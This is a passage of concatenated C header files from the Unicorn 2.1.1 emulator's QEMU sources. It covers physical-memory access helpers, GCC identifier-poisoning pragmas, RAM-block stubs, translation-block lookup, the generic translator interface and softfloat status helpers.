inline uint64_t glue(ldq_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldq_le, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint64_t glue(ldq_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldq_be, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint32_t glue(ldub_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_ldub, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint32_t glue(lduw_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_lduw_le, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline uint32_t glue(lduw_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr) { return glue(address_space_lduw_be, SUFFIX)(uc, ARG1, addr, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stl_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stl_le, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stl_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stl_be, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stb_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stb, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stw_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stw_le, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stw_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint32_t val) { glue(address_space_stw_be, SUFFIX)(uc, ARG1, addr, val, MEMTXATTRS_UNSPECIFIED, NULL); } static inline void glue(stq_le_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val) { 
    glue(address_space_stq_le, SUFFIX)(uc, ARG1, addr, val,
                                       MEMTXATTRS_UNSPECIFIED, NULL);
}

static inline void glue(stq_be_phys, SUFFIX)(struct uc_struct *uc, ARG1_DECL, hwaddr addr, uint64_t val)
{
    glue(address_space_stq_be, SUFFIX)(uc, ARG1, addr, val,
                                       MEMTXATTRS_UNSPECIFIED, NULL);
}
#endif

#undef ARG1_DECL
#undef ARG1
#undef SUFFIX
#undef TARGET_ENDIANNESS

unicorn-2.1.1/qemu/include/exec/poison.h

/* Poison identifiers that should not be used when building
   target independent device code.  */

#ifndef HW_POISON_H
#define HW_POISON_H
#ifdef __GNUC__

#pragma GCC poison TARGET_I386
#pragma GCC poison TARGET_X86_64
#pragma GCC poison TARGET_AARCH64
#pragma GCC poison TARGET_ALPHA
#pragma GCC poison TARGET_ARM
#pragma GCC poison TARGET_CRIS
#pragma GCC poison TARGET_HPPA
#pragma GCC poison TARGET_LM32
#pragma GCC poison TARGET_M68K
#pragma GCC poison TARGET_MICROBLAZE
#pragma GCC poison TARGET_MIPS
#pragma GCC poison TARGET_ABI_MIPSN32
#pragma GCC poison TARGET_ABI_MIPSO32
#pragma GCC poison TARGET_MIPS64
#pragma GCC poison TARGET_ABI_MIPSN64
#pragma GCC poison TARGET_MOXIE
#pragma GCC poison TARGET_NIOS2
#pragma GCC poison TARGET_OPENRISC
#pragma GCC poison TARGET_PPC
#pragma GCC poison TARGET_PPC64
#pragma GCC poison TARGET_ABI32
#pragma GCC poison TARGET_RX
#pragma GCC poison TARGET_S390X
#pragma GCC poison TARGET_SH4
#pragma GCC poison TARGET_SPARC
#pragma GCC poison TARGET_SPARC64
#pragma GCC poison TARGET_TILEGX
#pragma GCC poison TARGET_TRICORE
#pragma GCC poison TARGET_UNICORE32
#pragma GCC poison TARGET_XTENSA

#pragma GCC poison TARGET_ALIGNED_ONLY
#pragma GCC poison TARGET_HAS_BFLT
#pragma GCC poison TARGET_NAME
#pragma GCC poison TARGET_SUPPORTS_MTTCG
#pragma GCC poison TARGET_WORDS_BIGENDIAN
#pragma GCC poison BSWAP_NEEDED

#pragma GCC poison TARGET_LONG_BITS
#pragma GCC poison TARGET_FMT_lx
#pragma GCC poison TARGET_FMT_ld
#pragma GCC poison TARGET_FMT_lu

#pragma GCC poison TARGET_PAGE_SIZE
#pragma GCC poison TARGET_PAGE_MASK
#pragma GCC poison TARGET_PAGE_BITS
#pragma GCC poison TARGET_PAGE_ALIGN

#pragma GCC poison CPUArchState

#pragma GCC poison CPU_INTERRUPT_HARD
#pragma GCC poison CPU_INTERRUPT_EXITTB
#pragma GCC poison CPU_INTERRUPT_HALT
#pragma GCC poison CPU_INTERRUPT_DEBUG
#pragma GCC poison CPU_INTERRUPT_TGT_EXT_0
#pragma GCC poison CPU_INTERRUPT_TGT_EXT_1
#pragma GCC poison CPU_INTERRUPT_TGT_EXT_2
#pragma GCC poison CPU_INTERRUPT_TGT_EXT_3
#pragma GCC poison CPU_INTERRUPT_TGT_EXT_4
#pragma GCC poison CPU_INTERRUPT_TGT_INT_0
#pragma GCC poison CPU_INTERRUPT_TGT_INT_1
#pragma GCC poison CPU_INTERRUPT_TGT_INT_2

#pragma GCC poison CONFIG_ALPHA_DIS
#pragma GCC poison CONFIG_ARM_A64_DIS
#pragma GCC poison CONFIG_ARM_DIS
#pragma GCC poison CONFIG_CRIS_DIS
#pragma GCC poison CONFIG_HPPA_DIS
#pragma GCC poison CONFIG_I386_DIS
#pragma GCC poison CONFIG_LM32_DIS
#pragma GCC poison CONFIG_M68K_DIS
#pragma GCC poison CONFIG_MICROBLAZE_DIS
#pragma GCC poison CONFIG_MIPS_DIS
#pragma GCC poison CONFIG_NANOMIPS_DIS
#pragma GCC poison CONFIG_MOXIE_DIS
#pragma GCC poison CONFIG_NIOS2_DIS
#pragma GCC poison CONFIG_PPC_DIS
#pragma GCC poison CONFIG_RISCV_DIS
#pragma GCC poison CONFIG_S390_DIS
#pragma GCC poison CONFIG_SH4_DIS
#pragma GCC poison CONFIG_SPARC_DIS
#pragma GCC poison CONFIG_XTENSA_DIS

#pragma GCC poison CONFIG_LINUX_USER
#pragma GCC poison CONFIG_KVM
#pragma GCC poison CONFIG_SOFTMMU

#endif
#endif

unicorn-2.1.1/qemu/include/exec/ram_addr.h

/*
 * Declarations for cpu physical memory functions
 *
 * Copyright 2011 Red Hat, Inc. and/or its affiliates
 *
 * Authors:
 *  Avi Kivity <avi@redhat.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or
 * later.  See the COPYING file in the top-level directory.
 *
 */

/*
 * This header is for use by exec.c and memory.c ONLY.  Do not include it.
 * The functions declared here will be removed soon.
 */

#ifndef RAM_ADDR_H
#define RAM_ADDR_H

#include "cpu.h"
#include "sysemu/tcg.h"
#include "exec/ramlist.h"
#include "exec/ramblock.h"

static inline bool offset_in_ramblock(RAMBlock *b, ram_addr_t offset)
{
    return (b && b->host && offset < b->used_length) ?
        true : false;
}

static inline void *ramblock_ptr(RAMBlock *block, ram_addr_t offset)
{
    assert(offset_in_ramblock(block, offset));
    return (char *)block->host + offset;
}

static inline unsigned long int ramblock_recv_bitmap_offset(struct uc_struct *uc, void *host_addr,
                                                            RAMBlock *rb)
{
    uint64_t host_addr_offset =
        (uint64_t)(uintptr_t)((char *)host_addr - (char *)rb->host);
    return host_addr_offset >> TARGET_PAGE_BITS;
}

RAMBlock *qemu_ram_alloc_from_ptr(struct uc_struct *uc, ram_addr_t size, void *host,
                                  MemoryRegion *mr);
RAMBlock *qemu_ram_alloc(struct uc_struct *uc, ram_addr_t size, MemoryRegion *mr);

void qemu_ram_free(struct uc_struct *uc, RAMBlock *block);

#define DIRTY_CLIENTS_ALL     ((1 << DIRTY_MEMORY_NUM) - 1)
#define DIRTY_CLIENTS_NOCODE  (DIRTY_CLIENTS_ALL & ~(1 << DIRTY_MEMORY_CODE))

void tb_invalidate_phys_range(struct uc_struct *uc, ram_addr_t start, ram_addr_t end);

static inline bool cpu_physical_memory_get_dirty(ram_addr_t start,
                                                 ram_addr_t length,
                                                 unsigned client)
{
    return false;
}

static inline bool cpu_physical_memory_all_dirty(ram_addr_t start,
                                                 ram_addr_t length,
                                                 unsigned client)
{
    return false;
}

static inline bool cpu_physical_memory_is_clean(ram_addr_t addr)
{
    return true;
}

static inline void cpu_physical_memory_set_dirty_flag(ram_addr_t addr,
                                                      unsigned client)
{
}

static inline void cpu_physical_memory_set_dirty_range(ram_addr_t start,
                                                       ram_addr_t length,
                                                       uint8_t mask)
{
}

#if !defined(_WIN32)
static inline void cpu_physical_memory_set_dirty_lebitmap(unsigned long *bitmap,
                                                          ram_addr_t start,
                                                          ram_addr_t pages)
{
}
#endif /* not _WIN32 */

bool cpu_physical_memory_test_and_clear_dirty(ram_addr_t start,
                                              ram_addr_t length,
                                              unsigned client);

static inline void cpu_physical_memory_clear_dirty_range(ram_addr_t start,
                                                         ram_addr_t length)
{
}

/* Called with RCU critical section */
static inline
uint64_t cpu_physical_memory_sync_dirty_bitmap(RAMBlock *rb,
                                               ram_addr_t start,
                                               ram_addr_t length,
                                               uint64_t *real_dirty_pages)
{
    return 0;
}
#endif

unicorn-2.1.1/qemu/include/exec/ramblock.h

/*
 * Declarations for cpu physical memory functions
 *
 * Copyright 2011 Red Hat, Inc. and/or its affiliates
 *
 * Authors:
 *  Avi Kivity <avi@redhat.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or
 * later.  See the COPYING file in the top-level directory.
 *
 */

/*
 * This header is for use by exec.c and memory.c ONLY.  Do not include it.
 * The functions declared here will be removed soon.
 */

#ifndef QEMU_EXEC_RAMBLOCK_H
#define QEMU_EXEC_RAMBLOCK_H

#include "cpu-common.h"
#include "qemu.h"

#endif

unicorn-2.1.1/qemu/include/exec/ramlist.h

#ifndef RAMLIST_H
#define RAMLIST_H

#include "qemu/queue.h"
#include "qemu/thread.h"
//#include "qemu/rcu.h"
//#include "qemu/rcu_queue.h"

#define DIRTY_MEMORY_VGA       0
#define DIRTY_MEMORY_CODE      1
#define DIRTY_MEMORY_MIGRATION 2
#define DIRTY_MEMORY_NUM       3        /* num of dirty bits */

#define INTERNAL_RAMBLOCK_FOREACH(block)  \
    QLIST_FOREACH(block, &uc->ram_list.blocks, next)
/* Never use the INTERNAL_ version except for defining other macros */
#define RAMBLOCK_FOREACH(block) INTERNAL_RAMBLOCK_FOREACH(block)

#endif /* RAMLIST_H */

unicorn-2.1.1/qemu/include/exec/softmmu-semi.h

/*
 * Helper routines to provide target memory access for semihosting
 * syscalls in system emulation mode.
 *
 * Copyright (c) 2007 CodeSourcery.
 *
 * This code is licensed under the GPL
 */

#ifndef SOFTMMU_SEMI_H
#define SOFTMMU_SEMI_H

#include "cpu.h"

static inline uint64_t softmmu_tget64(CPUArchState *env, target_ulong addr)
{
    uint64_t val;

    cpu_memory_rw_debug(env_cpu(env), addr, (uint8_t *)&val, 8, 0);
    return tswap64(val);
}

static inline uint32_t softmmu_tget32(CPUArchState *env, target_ulong addr)
{
    uint32_t val;

    cpu_memory_rw_debug(env_cpu(env), addr, (uint8_t *)&val, 4, 0);
    return tswap32(val);
}

static inline uint32_t softmmu_tget8(CPUArchState *env, target_ulong addr)
{
    uint8_t val;

    cpu_memory_rw_debug(env_cpu(env), addr, &val, 1, 0);
    return val;
}

#define get_user_u64(arg, p) ({ arg = softmmu_tget64(env, p); 0; })
#define get_user_u32(arg, p) ({ arg = softmmu_tget32(env, p) ; 0; })
#define get_user_u8(arg, p) ({ arg = softmmu_tget8(env, p) ; 0; })
#define get_user_ual(arg, p) get_user_u32(arg, p)

static inline void softmmu_tput64(CPUArchState *env, target_ulong addr,
                                  uint64_t val)
{
    val = tswap64(val);
    cpu_memory_rw_debug(env_cpu(env), addr, (uint8_t *)&val, 8, 1);
}

static inline void softmmu_tput32(CPUArchState *env, target_ulong addr,
                                  uint32_t val)
{
    val = tswap32(val);
    cpu_memory_rw_debug(env_cpu(env), addr, (uint8_t *)&val, 4, 1);
}

#define put_user_u64(arg, p) ({ softmmu_tput64(env, p, arg) ; 0; })
#define put_user_u32(arg, p) ({ softmmu_tput32(env, p, arg) ; 0; })
#define put_user_ual(arg, p) put_user_u32(arg, p)

static void *softmmu_lock_user(CPUArchState *env, target_ulong addr,
                               target_ulong len, int copy)
{
    uint8_t *p;
    /* TODO: Make this something that isn't fixed size. */
    p = malloc(len);
    if (p && copy) {
        cpu_memory_rw_debug(env_cpu(env), addr, p, len, 0);
    }
    return p;
}
#define lock_user(type, p, len, copy) softmmu_lock_user(env, p, len, copy)

static char *softmmu_lock_user_string(CPUArchState *env, target_ulong addr)
{
    char *p;
    char *s;
    uint8_t c;
    /* TODO: Make this something that isn't fixed size. */
    s = p = malloc(1024);
    if (!s) {
        return NULL;
    }
    do {
        cpu_memory_rw_debug(env_cpu(env), addr, &c, 1, 0);
        addr++;
        *(p++) = c;
    } while (c);
    return s;
}
#define lock_user_string(p) softmmu_lock_user_string(env, p)

static void softmmu_unlock_user(CPUArchState *env, void *p, target_ulong addr,
                                target_ulong len)
{
    if (len) {
        cpu_memory_rw_debug(env_cpu(env), addr, p, len, 1);
    }
    free(p);
}
#define unlock_user(s, args, len) softmmu_unlock_user(env, s, args, len)

#endif

unicorn-2.1.1/qemu/include/exec/target_page.h

/*
 * Target page sizes and friends for non target files
 *
 * Copyright (c) 2017 Red Hat Inc
 *
 * Authors:
 *  David Alan Gilbert <dgilbert@redhat.com>
 *  Juan Quintela <quintela@redhat.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#ifndef EXEC_TARGET_PAGE_H
#define EXEC_TARGET_PAGE_H

struct uc_struct;

size_t qemu_target_page_size(struct uc_struct *uc);
int qemu_target_page_bits(struct uc_struct *uc);
int qemu_target_page_bits_min(void);

#endif

unicorn-2.1.1/qemu/include/exec/tb-context.h

/*
 * Internal structs that QEMU exports to TCG
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef QEMU_TB_CONTEXT_H
#define QEMU_TB_CONTEXT_H

#include "qemu/thread.h"
#include "qemu/qht.h"

#define CODE_GEN_HTABLE_BITS     15
#define CODE_GEN_HTABLE_SIZE     (1 << CODE_GEN_HTABLE_BITS)

typedef struct TranslationBlock TranslationBlock;
typedef struct TBContext TBContext;

struct TBContext {

    struct qht htable;

    /* statistics */
    unsigned tb_flush_count;
};

#endif

unicorn-2.1.1/qemu/include/exec/tb-hash.h

/*
 * internal execution defines for qemu
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef EXEC_TB_HASH_H
#define EXEC_TB_HASH_H

#include "exec/cpu-defs.h"
#include "exec/exec-all.h"
#include "qemu/xxhash.h"

/* Only the bottom TB_JMP_PAGE_BITS of the jump cache hash bits vary for
   addresses on the same page.  The top bits are the same.  This allows
   TLB invalidation to quickly clear a subset of the hash table.  */
#define TB_JMP_PAGE_BITS (TB_JMP_CACHE_BITS / 2)
#define TB_JMP_PAGE_SIZE (1 << TB_JMP_PAGE_BITS)
#define TB_JMP_ADDR_MASK (TB_JMP_PAGE_SIZE - 1)
#define TB_JMP_PAGE_MASK (TB_JMP_CACHE_SIZE - TB_JMP_PAGE_SIZE)

static inline unsigned int tb_jmp_cache_hash_page(struct uc_struct *uc,
                                                  target_ulong pc)
{
    target_ulong tmp;
    tmp = pc ^ (pc >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS));
    return (tmp >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)) & TB_JMP_PAGE_MASK;
}

static inline unsigned int tb_jmp_cache_hash_func(struct uc_struct *uc,
                                                  target_ulong pc)
{
    target_ulong tmp;
    tmp = pc ^ (pc >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS));
    return (((tmp >> (TARGET_PAGE_BITS - TB_JMP_PAGE_BITS)) & TB_JMP_PAGE_MASK)
            | (tmp & TB_JMP_ADDR_MASK));
}

static inline
uint32_t tb_hash_func(tb_page_addr_t phys_pc, target_ulong pc, uint32_t flags,
                      uint32_t cf_mask, uint32_t trace_vcpu_dstate)
{
    return qemu_xxhash7(phys_pc, pc, flags, cf_mask, trace_vcpu_dstate);
}

#endif

unicorn-2.1.1/qemu/include/exec/tb-lookup.h

/*
 * Copyright (C) 2017, Emilio G. Cota <cota@braap.org>
 *
 * License: GNU GPL, version 2 or later.
 *   See the COPYING file in the top-level directory.
 */

#ifndef EXEC_TB_LOOKUP_H
#define EXEC_TB_LOOKUP_H

#ifdef NEED_CPU_H
#include "cpu.h"
#else
#include "exec/poison.h"
#endif

#include "exec/exec-all.h"
#include "exec/tb-hash.h"

/* Might cause an exception, so have a longjmp destination ready */
static inline TranslationBlock *
tb_lookup__cpu_state(CPUState *cpu, target_ulong *pc, target_ulong *cs_base,
                     uint32_t *flags, uint32_t cf_mask)
{
    CPUArchState *env = (CPUArchState *)cpu->env_ptr;
    TranslationBlock *tb;
    uint32_t hash;

    cpu_get_tb_cpu_state(env, pc, cs_base, flags);
    hash = tb_jmp_cache_hash_func(env->uc, *pc);
    tb = cpu->tb_jmp_cache[hash];

    cf_mask &= ~CF_CLUSTER_MASK;
    cf_mask |= ((uint32_t)cpu->cluster_index) << CF_CLUSTER_SHIFT;

    if (likely(tb &&
               tb->pc == *pc &&
               tb->cs_base == *cs_base &&
               tb->flags == *flags &&
               tb->trace_vcpu_dstate == *cpu->trace_dstate &&
               (tb_cflags(tb) & (CF_HASH_MASK | CF_INVALID)) == cf_mask)) {
        return tb;
    }
    tb = tb_htable_lookup(cpu, *pc, *cs_base, *flags, cf_mask);
    if (tb == NULL) {
        return NULL;
    }
    cpu->tb_jmp_cache[hash] = tb;
    return tb;
}

#endif /* EXEC_TB_LOOKUP_H */

unicorn-2.1.1/qemu/include/exec/translator.h

/*
 * Generic intermediate code generation.
 *
 * Copyright (C) 2016-2017 Lluís Vilanova <vilanova@ac.upc.edu>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#ifndef EXEC__TRANSLATOR_H
#define EXEC__TRANSLATOR_H

/*
 * Include this header from a target-specific file, and add a
 *
 *      DisasContextBase base;
 *
 * member in your target-specific DisasContext.
 */

#include "qemu/bswap.h"
#include "exec/exec-all.h"
#include "exec/cpu_ldst.h"
#include "tcg/tcg.h"

/**
 * DisasJumpType:
 * @DISAS_NEXT: Next instruction in program order.
 * @DISAS_TOO_MANY: Too many instructions translated.
 * @DISAS_NORETURN: Following code is dead.
 * @DISAS_TARGET_*: Start of target-specific conditions.
 *
 * What instruction to disassemble next.
 */
typedef enum DisasJumpType {
    DISAS_NEXT,
    DISAS_TOO_MANY,
    DISAS_NORETURN,
    DISAS_TARGET_0,
    DISAS_TARGET_1,
    DISAS_TARGET_2,
    DISAS_TARGET_3,
    DISAS_TARGET_4,
    DISAS_TARGET_5,
    DISAS_TARGET_6,
    DISAS_TARGET_7,
    DISAS_TARGET_8,
    DISAS_TARGET_9,
    DISAS_TARGET_10,
    DISAS_TARGET_11,
} DisasJumpType;

/**
 * DisasContextBase:
 * @tb: Translation block for this disassembly.
 * @pc_first: Address of first guest instruction in this TB.
 * @pc_next: Address of next guest instruction in this TB (current during
 *           disassembly).
 * @is_jmp: What instruction to disassemble next.
 * @num_insns: Number of translated instructions (including current).
 * @max_insns: Maximum number of instructions to be translated in this TB.
 * @singlestep_enabled: "Hardware" single stepping enabled.
 *
 * Architecture-agnostic disassembly context.
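 *
 * As a rough, illustrative sketch (not part of the original header), a
 * target front-end embeds this struct as the first member of its own
 * context, per the instruction at the top of this file; the field name
 * below is hypothetical:
 *
 *     typedef struct DisasContext {
 *         DisasContextBase base;      // must be embedded, per above
 *         int some_target_state;      // hypothetical target-specific field
 *     } DisasContext;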
 */
typedef struct DisasContextBase {
    TranslationBlock *tb;
    target_ulong pc_first;
    target_ulong pc_next;
    DisasJumpType is_jmp;
    int num_insns;
    int max_insns;
    bool singlestep_enabled;
} DisasContextBase;

/**
 * TranslatorOps:
 * @init_disas_context:
 *      Initialize the target-specific portions of DisasContext struct.
 *      The generic DisasContextBase has already been initialized.
 *
 * @tb_start:
 *      Emit any code required before the start of the main loop,
 *      after the generic gen_tb_start().
 *
 * @insn_start:
 *      Emit the tcg_gen_insn_start opcode.
 *
 * @breakpoint_check:
 *      When called, the breakpoint has already been checked to match the PC,
 *      but the target may decide the breakpoint missed the address
 *      (e.g., due to conditions encoded in their flags).  Return true to
 *      indicate that the breakpoint did hit, in which case no more breakpoints
 *      are checked.  If the breakpoint did hit, emit any code required to
 *      signal the exception, and set db->is_jmp as necessary to terminate
 *      the main loop.
 *
 * @translate_insn:
 *      Disassemble one instruction and set db->pc_next for the start
 *      of the following instruction.  Set db->is_jmp as necessary to
 *      terminate the main loop.
 *
 * @tb_stop:
 *      Emit any opcodes required to exit the TB, based on db->is_jmp.
 */
typedef struct TranslatorOps {
    void (*init_disas_context)(DisasContextBase *db, CPUState *cpu);
    void (*tb_start)(DisasContextBase *db, CPUState *cpu);
    void (*insn_start)(DisasContextBase *db, CPUState *cpu);
    bool (*breakpoint_check)(DisasContextBase *db, CPUState *cpu,
                             const CPUBreakpoint *bp);
    void (*translate_insn)(DisasContextBase *db, CPUState *cpu);
    void (*tb_stop)(DisasContextBase *db, CPUState *cpu);
} TranslatorOps;

/**
 * translator_loop:
 * @ops: Target-specific operations.
 * @db: Disassembly context.
 * @cpu: Target vCPU.
 * @tb: Translation block.
 * @max_insns: Maximum number of insns to translate.
 *
 * Generic translator loop.
 *
 * Translation will stop in the following cases (in order):
 * - When is_jmp set by #TranslatorOps::breakpoint_check.
 *   - set to DISAS_TOO_MANY exits after translating one more insn
 *   - set to any other value than DISAS_NEXT exits immediately.
 * - When is_jmp set by #TranslatorOps::translate_insn.
 *   - set to any value other than DISAS_NEXT exits immediately.
 * - When the TCG operation buffer is full.
 * - When single-stepping is enabled (system-wide or on the current vCPU).
 * - When too many instructions have been translated.
 */
void translator_loop(const TranslatorOps *ops, DisasContextBase *db,
                     CPUState *cpu, TranslationBlock *tb, int max_insns);

void translator_loop_temp_check(DisasContextBase *db);

/*
 * Translator Load Functions
 *
 * These are intended to replace the direct usage of the cpu_ld*_code
 * functions and are mandatory for front-ends that have been migrated
 * to the common translator_loop.  These functions are only intended
 * to be called from the translation stage and should not be called
 * from helper functions.  Those functions should be converted to encode
 * the relevant information at translation time.
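 *
 * As an illustrative (non-original) sketch, assuming `tcg_ctx`, `env` and a
 * target context `dc` embedding DisasContextBase are in scope, a decoder for
 * a 16-bit instruction encoding would fetch opcodes roughly like this:
 *
 *     uint16_t insn = translator_lduw(tcg_ctx, env, dc->base.pc_next);
 *     dc->base.pc_next += 2;   // advance past the fetched instruction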
 */

#define GEN_TRANSLATOR_LD(fullname, type, load_fn, swap_fn)             \
    static inline type                                                  \
    fullname ## _swap(TCGContext *tcg_ctx, CPUArchState *env, abi_ptr pc, bool do_swap) \
    {                                                                   \
        type ret = load_fn(env, pc);                                    \
        if (do_swap) {                                                  \
            ret = swap_fn(ret);                                         \
        }                                                               \
        return ret;                                                     \
    }                                                                   \
                                                                        \
    static inline type fullname(TCGContext *tcg_ctx, CPUArchState *env, abi_ptr pc) \
    {                                                                   \
        return fullname ## _swap(tcg_ctx, env, pc, false);              \
    }

GEN_TRANSLATOR_LD(translator_ldub, uint8_t, cpu_ldub_code, /* no swap */)
GEN_TRANSLATOR_LD(translator_ldsw, int16_t, cpu_ldsw_code, bswap16)
GEN_TRANSLATOR_LD(translator_lduw, uint16_t, cpu_lduw_code, bswap16)
GEN_TRANSLATOR_LD(translator_ldl, uint32_t, cpu_ldl_code, bswap32)
GEN_TRANSLATOR_LD(translator_ldq, uint64_t, cpu_ldq_code, bswap64)
#undef GEN_TRANSLATOR_LD

#endif /* EXEC__TRANSLATOR_H */

unicorn-2.1.1/qemu/include/fpu/
unicorn-2.1.1/qemu/include/fpu/softfloat-helpers.h

/*
 * QEMU float support - standalone helpers
 *
 * This is provided for files that don't need the access to the full
 * set of softfloat functions. Typically this is cpu initialisation
 * code which wants to set default rounding and exceptions modes.
 *
 * The code in this source file is derived from release 2a of the SoftFloat
 * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and
 * some later contributions) are provided under that license, as detailed below.
 * It has subsequently been modified by contributors to the QEMU Project,
 * so some portions are provided under:
 *  the SoftFloat-2a license
 *  the BSD license
 *  GPL-v2-or-later
 *
 * Any future contributions to this file after December 1st 2014 will be
 * taken to be licensed under the Softfloat-2a license unless specifically
 * indicated otherwise.
 */

/*
===============================================================================
This C header file is part of the SoftFloat IEC/IEEE Floating-point
Arithmetic Package, Release 2a.

Written by John R. Hauser.  This work was made possible in part by the
International Computer Science Institute, located at Suite 600, 1947 Center
Street, Berkeley, California 94704.  Funding was partially provided by the
National Science Foundation under grant MIP-9311980.  The original version
of this code was written as part of a project to build a fixed-point vector
processor in collaboration with the University of California at Berkeley,
overseen by Profs. Nelson Morgan and John Wawrzynek.
More information is available through the Web page
`http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'.

THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE.  Although reasonable effort
has been made to avoid it, THIS SOFTWARE MAY CONTAIN FAULTS THAT WILL AT
TIMES RESULT IN INCORRECT BEHAVIOR.  USE OF THIS SOFTWARE IS RESTRICTED TO
PERSONS AND ORGANIZATIONS WHO CAN AND WILL TAKE FULL RESPONSIBILITY FOR ANY
AND ALL LOSSES, COSTS, OR OTHER PROBLEMS ARISING FROM ITS USE.

Derivative works are acceptable, even for commercial purposes, so long as
(1) they include prominent notice that the work is derivative, and (2) they
include prominent notice akin to these four paragraphs for those parts of
this code that are retained.

===============================================================================
*/

#ifndef _SOFTFLOAT_HELPERS_H_
#define _SOFTFLOAT_HELPERS_H_

#include "fpu/softfloat-types.h"

static inline void set_float_detect_tininess(int val, float_status *status)
{
    status->float_detect_tininess = val;
}

static inline void set_float_rounding_mode(int val, float_status *status)
{
    status->float_rounding_mode = val;
}

static inline void set_float_exception_flags(int val, float_status *status)
{
    status->float_exception_flags = val;
}

static inline void set_floatx80_rounding_precision(int val,
                                                   float_status *status)
{
    status->floatx80_rounding_precision = val;
}

static inline void set_flush_to_zero(flag val, float_status *status)
{
    status->flush_to_zero = val;
}

static inline void set_flush_inputs_to_zero(flag val, float_status *status)
{
    status->flush_inputs_to_zero = val;
}

static inline void set_default_nan_mode(flag val, float_status *status)
{
    status->default_nan_mode = val;
}

static inline void set_snan_bit_is_one(flag val, float_status *status)
{
    status->snan_bit_is_one = val;
}

static inline int get_float_detect_tininess(float_status *status)
{
    return status->float_detect_tininess;
}

static inline int get_float_rounding_mode(float_status *status)
{
    return status->float_rounding_mode;
}

static inline int get_float_exception_flags(float_status *status)
{
    return status->float_exception_flags;
}

static inline int get_floatx80_rounding_precision(float_status *status)
{
    return status->floatx80_rounding_precision;
}

static inline flag get_flush_to_zero(float_status *status)
{
    return status->flush_to_zero;
}

static inline flag get_flush_inputs_to_zero(float_status *status)
{
    return status->flush_inputs_to_zero;
}

static inline flag get_default_nan_mode(float_status *status)
{
    return status->default_nan_mode;
}

#endif /* _SOFTFLOAT_HELPERS_H_ */

unicorn-2.1.1/qemu/include/fpu/softfloat-macros.h

/*
 * QEMU float support macros
 *
 * The code in this source file is derived from release 2a of the
SoftFloat * IEC/IEEE Floating-point Arithmetic Package. Those parts of the code (and * some later contributions) are provided under that license, as detailed below. * It has subsequently been modified by contributors to the QEMU Project, * so some portions are provided under: * the SoftFloat-2a license * the BSD license * GPL-v2-or-later * * Any future contributions to this file after December 1st 2014 will be * taken to be licensed under the Softfloat-2a license unless specifically * indicated otherwise. */ /* =============================================================================== This C source fragment is part of the SoftFloat IEC/IEEE Floating-point Arithmetic Package, Release 2a. Written by John R. Hauser. This work was made possible in part by the International Computer Science Institute, located at Suite 600, 1947 Center Street, Berkeley, California 94704. Funding was partially provided by the National Science Foundation under grant MIP-9311980. The original version of this code was written as part of a project to build a fixed-point vector processor in collaboration with the University of California at Berkeley, overseen by Profs. Nelson Morgan and John Wawrzynek. More information is available through the Web page `http://HTTP.CS.Berkeley.EDU/~jhauser/ arithmetic/SoftFloat.html'. THIS SOFTWARE IS DISTRIBUTED AS IS, FOR FREE. Although reasonable effort has been made to avoid it, THIS 